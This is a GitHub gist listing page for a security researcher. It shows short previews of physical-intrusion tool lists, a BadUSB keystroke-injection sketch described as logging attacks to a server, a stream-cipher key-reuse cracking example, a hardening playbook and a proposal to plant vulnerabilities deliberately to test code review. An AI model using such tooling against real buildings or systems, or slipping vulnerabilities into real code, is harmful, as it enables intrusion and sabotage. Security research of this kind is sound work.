Skip to content

Instantly share code, notes, and snippets.

View lrvick's full-sized avatar

Lance R. Vick lrvick

402 followers · 118 following
View GitHub Profile
@lrvick
lrvick / physsec_shopping.md
Last active April 3, 2023 17:16
PhysSec Shopping List

PhysSec Shopping List

Need to get into a building? Start a police car? Borrow a bulldozer? Go to a restricted elevator floor? It is pretty easy with the right tools and sometimes a bit of practice.

Knowing what those tools even are is half the battle. This guide attempts to solve that for you for for free.

Actually obtaining these tools is non-trivial but -all- of them can be obtained

@lrvick
lrvick / role.md
Last active September 21, 2024 12:26
My default canned response to all recruiters. Know what you want out of your career and articulate it specifically if you want to get it either at your current employer, or a different one.

I know exactly what I want in a long term role so I can save us some time.

For me to be willing to change jobs at this point I would expect:

  • A high level of autonomy where I am allowed to work weird hours.
  • Have my obsession for auditable everything be humored/tolerated
    • I prefer to work with open platforms like RISC-V and OpenPower and open operating systems like Linux, FreeBSD, OpenBSD, Sel4, etc
    • I am never asked to rely on any software I can't audit on any of my personal or company devices.
  • No need to go find clients myself or worry about the business side of the house
  • Travel/lodging covered for the 2-3 security conferences I try to attend every year.
@lrvick
lrvick / xinitrc
Created March 28, 2019 01:41
#!/bin/bash
# Let GPG know about our current terminal
gpg-connect-agent updatestartuptty /bye
# Start compositor for faster rendering for terminals etc
compton &
# Set wallpaper
nitrogen --set-scaled ~/.wallpaper/yourcoolwallpaper.jpg
@lrvick
lrvick / usbninja.ino
Last active September 6, 2019 05:20
One size fits all BadUSB attack for Mac/Windows for the USBNinja. Logs all attacks to server. Server can optionally provide a unique payload for each target hostname/user combo.
#include <NinjaKeyboard.h>
void setup(){}
void loop() {}
void payloadA(){
USBninjaOnline();
NinjaKeyboard.begin();
NinjaKeyboard.delay(1000);
@lrvick
lrvick / distributed_trust_git_flow.md
Last active February 20, 2019 00:51
An opinionated git workflow optimized for a strong resistance to tampering by any single party.

Distributed Trust Git Flow

Goals

  • Remove chance of undetected malicious or accidental mutations of code in VCS
  • The VCS and review tool servers as well as their maintainers must never be trusted.
  • We must be able to cryptographically prove
    • Who authored all commits
    • Who on engineering team signed the release candidate tag on a ref
  • Who on release team signed the release tag for a ref
@lrvick
lrvick / hardening_playbook.md
Created January 25, 2019 10:33
Hardening Playbook: My dumping ground for my system hardening research, mostly focusing on Linux but paying attention to other systems.

Hardening Playbook

Threat profile

  • Attacker has unlimited funding
  • Attacker has decades of patience
  • Attacker knows everything you do and more
  • Attacker has no morals and can break any law
  • Attacker can compromise any single system
  • Attacker can compromise any single individual
@lrvick
lrvick / random_red_team.md
Created December 12, 2018 03:03
Random Red Team

Random Red Team

Summary

This document seeks to detail intentionally introducing security vulnerbilties into projects to test code review processes and foster a healthy and expected culture of distrust and higher security scrutiny during code reviews regardless of social standing, or experience level of the author.

Motivation

@lrvick
lrvick / diff-tree.md
Created October 2, 2018 22:46
Git diff-tree issues

Git 2.11.0

$ git rev-parse HEAD
2e6215c920f384f958dc6dafcbaee5698c965657
$ git diff-tree -p "HEAD^"..HEAD | sha256sum
ae4fc1d2285ab6ac84cdd8ff6235f5534b6ded467dd8f586cbe1bfe885cc1afe  -
$ git diff-tree -p "HEAD^"..HEAD | git patch-id --stable
d9c0bf01265096e69f24b6e10d6c471f92d203c3 0000000000000000000000000000000000000000
@lrvick
lrvick / crack_otp.py
Created September 9, 2018 03:28
Example for cracking stream ciphers with recycled keys.
messages = (
"This is the secret message one. It is the best one",
"I am typing things to fill up space. La La La LA LAH LAH LAH LAH LAH",
"Why are the ponies attacking my brain?! I DON'T KNOW!",
"The chicken crossed the road in order to murder all of the babies",
"I think the most evil thing is the chocolate on the road that kills",
"There is a light above my head and it is bright and should die",
"bunnies are cute and I want to squeeze them to DEATH",
"All this talk about death is making me hungry. I should find food",
@lrvick
lrvick / dc26.md
Last active August 10, 2018 04:49
Defcon 26 Plans

Defcon 26

Itinerary

Thursday

09:00

  • Arrive At Cesars
  • Get admission badges
  • Checkin to room